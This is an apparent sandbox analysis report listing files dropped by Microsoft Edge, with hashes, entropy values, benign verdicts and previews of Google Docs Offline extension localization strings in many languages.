                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
